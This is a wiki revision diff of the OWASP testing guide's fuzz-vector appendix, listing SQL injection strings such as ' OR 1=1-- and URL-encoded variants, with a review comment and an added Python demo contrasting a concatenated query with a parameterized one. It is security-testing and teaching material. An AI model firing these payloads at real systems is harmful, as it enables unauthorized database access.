Difference between revisions of "OWASP Testing Guide Appendix C: Fuzz Vectors"
Line 5: | Line 5: | ||
Once an error has been discovered identifying and exploiting a potential vulnerability is where skill is required: | Once an error has been discovered identifying and exploiting a potential vulnerability is where skill is required: | ||
− | + | <nowiki>' OR 1=1--</nowiki><br> | |
− | <nowiki>' OR 1=1-- < | + | <nowiki>OR 1=1</nowiki><br> |
− | OR 1=1 < | + | <nowiki>' OR '1'='1</nowiki><br> |
− | ' OR '1'='1 | + | <nowiki>; OR '1'='1'</nowiki><br> |
− | ; OR '1'='1' | ||
%22+or+isnull%281%2F0%29+%2F* | %22+or+isnull%281%2F0%29+%2F* | ||
%27+OR+%277659%27%3D%277659 | %27+OR+%277659%27%3D%277659 | ||
%22+or+isnull%281%2F0%29+%2F* | %22+or+isnull%281%2F0%29+%2F* | ||
− | %27+--+ | + | %27+--+ |
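Review bot: The vector `%22+or+isnull%281%2F0%29+%2F*` appears twice in the unchanged context lines of this hunk, so one copy is redundant and could be dropped. The new revision also wraps only the first four vectors in <nowiki> with a trailing <br>, leaving the URL-encoded vectors bare; giving every vector the same markup would keep the rendered list consistent and rule out any of them being interpreted as wiki markup.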
Revision as of 16:34, 7 September 2006
The following are fuzzing vectors which can be used with WebScarab or another fuzzer. Fuzzing is the "kitchen sink" approach to testing the response of an application to parameter manipulation. Generally one looks for error conditions that are generated in an application as a result of fuzzing. This is the simple part of the discovery phase. Once an error has been discovered, identifying and exploiting a potential vulnerability is where skill is required:
' OR 1=1--
OR 1=1
' OR '1'='1
; OR '1'='1'
%22+or+isnull%281%2F0%29+%2F*
%27+OR+%277659%27%3D%277659
%22+or+isnull%281%2F0%29+%2F*
%27+--+
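The following is an added example, not part of the original wiki page: it feeds the vectors listed above to a string-concatenated lookup and to a parameterized one, and records the "error condition" the paragraph describes alongside the outcome of the hardened form. The in-memory SQLite database, the `users` table and all function names are assumptions made for the illustration.

```python
import sqlite3
from urllib.parse import unquote_plus

# Vectors copied from the list above; the encoded ones are URL-decoded
# the way a web framework would decode a form or query-string value.
VECTORS = [
    "' OR 1=1--", "OR 1=1", "' OR '1'='1", "; OR '1'='1'",
    unquote_plus("%22+or+isnull%281%2F0%29+%2F*"),
    unquote_plus("%27+OR+%277659%27%3D%277659"),
    unquote_plus("%27+--+"),
]

def _db():
    # Constructed sample data: a hypothetical two-row users table.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (name TEXT)")
    db.executemany("INSERT INTO users VALUES (?)", [("alice",), ("bob",)])
    return db

def _outcome(db, sql, params=()):
    """Classify one query: 'error', 'rows' (data returned) or 'none'."""
    try:
        return "rows" if db.execute(sql, params).fetchall() else "none"
    except (sqlite3.Error, sqlite3.Warning):
        return "error"

def lookup_concat(db, name):
    # Weak form: the input becomes part of the SQL text.
    return _outcome(db, "SELECT name FROM users WHERE name = '" + name + "'")

def lookup_param(db, name):
    # Hardened form: the input is bound as data and never parsed as SQL.
    return _outcome(db, "SELECT name FROM users WHERE name = ?", (name,))

def compare():
    """Map each vector to (concatenated outcome, parameterized outcome)."""
    db = _db()
    return {v: (lookup_concat(db, v), lookup_param(db, v)) for v in VECTORS}

if __name__ == "__main__":
    for vector, (weak, hardened) in compare().items():
        print(f"{vector!r:28} concat={weak:5} param={hardened}")
```

In this single-quoted string context the double-quote vector is inert, which shows why the same list produces different results depending on where the input lands in the query.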